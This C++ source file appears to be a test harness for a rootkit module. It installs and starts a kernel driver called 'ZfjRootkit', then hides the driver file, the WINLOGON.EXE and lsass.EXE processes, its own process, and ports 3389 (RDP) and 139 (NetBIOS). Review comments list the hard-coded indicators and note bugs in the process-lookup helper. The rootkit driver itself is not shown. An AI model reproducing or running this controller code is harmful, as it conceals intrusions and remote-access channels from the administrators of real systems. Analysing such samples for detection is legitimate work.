

#include "PinboardInterface.h" 
#include  
#include  
#include  
#pragma comment (lib, "Psapi.lib") 
 
/// Look up a process ID by executable image name.
///
/// Takes a TH32CS_SNAPPROCESS snapshot and walks it with Process32First /
/// Process32Next, comparing each entry's szExeFile to szName with _tcsicmp
/// (case-insensitive). The walk stops at the first match.
///
/// @param szName  Executable name to match. PROCESSENTRY32::szExeFile holds
///                the image file name only, so a path in szName will not match.
/// @return        th32ProcessID of the first matching entry, or 0 when no
///                entry matches. Because 0 is also the "not found" value, a
///                caller cannot distinguish a miss from the System Idle PID.
///
/// NOTE(review): the handle returned by CreateToolhelp32Snapshot is never
/// compared against INVALID_HANDLE_VALUE, and the BOOL from Process32First is
/// discarded. If either call fails, the do/while body compares szName against
/// the uninitialized szExeFile of pe32 (only dwSize was set) before the loop
/// terminates, and CloseHandle is then called on an invalid handle.
DWORD GetProcessIdByName(LPCTSTR szName) 
{ 
	DWORD dwRet = 0; 
    HANDLE hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 ); 
    PROCESSENTRY32 pe32; 
    pe32.dwSize = sizeof( PROCESSENTRY32 );   // required by the Toolhelp API before the first call
    Process32First( hSnapshot, &pe32 );       // return value unchecked, see note above
    do 
	{ 
 
		if ( _tcsicmp(pe32.szExeFile, szName) == 0) 
		{ 
			dwRet = pe32.th32ProcessID; 
			break;                            // first match wins
		} 
 
 
    } while ( Process32Next( hSnapshot, &pe32 ) ); 
    CloseHandle( hSnapshot ); 
	return dwRet; 
} 
 
/// Test harness that drives the RootKitModule Pinboard interface end to end:
/// install and start a kernel driver, then register the artifacts the module
/// is asked to conceal (a file, three process IDs, two TCP ports) and switch
/// each hiding mode on.
///
/// From a defender's point of view, every value below is a hard-coded
/// indicator: the driver image path and service name passed to CreateDriver,
/// the hidden file name, the target process names, and ports 3389 and 139.
/// Each call's effect is inferred from the method name only; the Pinboard
/// implementation is not visible in this file.
///
/// NOTE(review): `void main()` is not a valid signature in standard C++
/// (the standard requires `int main`); it is accepted only as a compiler
/// extension. No return value of any interface call is checked, so a failed
/// CreateDriver/StartDriver still lets the remaining calls run.
void main() 
{ 
	CPinboardPtr spRootKitModule = CreatePinboardInstance(RootKitModule); 
	spRootKitModule->Test();   // exercise the test interface
	spRootKitModule->CreateDriver("c:\\__ZHF__ROORKIT.SYS", "ZfjRootkit");   // driver image path and service name
	spRootKitModule->StartDriver();  // start the driver
	spRootKitModule->AddHideFile("__ZHF__roorkit.SYS"); // hide this file (the driver's own image)
	spRootKitModule->AddHideProcessId( GetProcessIdByName("WINLOGON.EXE")); // hide the WINLOGON.EXE process
	spRootKitModule->AddHideProcessId( GetProcessIdByName("lsass.EXE")); // hide the lsass.EXE process
	spRootKitModule->AddHideProcessId( GetCurrentProcessId() ); // hide this process itself
	spRootKitModule->AddHidePort(3389);  // hide port 3389 (RDP)
	spRootKitModule->AddHidePort(139);  // hide port 139 (NetBIOS session)
	spRootKitModule->StartHideFile();  // enable file hiding
	spRootKitModule->StartHidePort();  // enable port hiding
	spRootKitModule->StartHideProcess();  // enable process hiding
}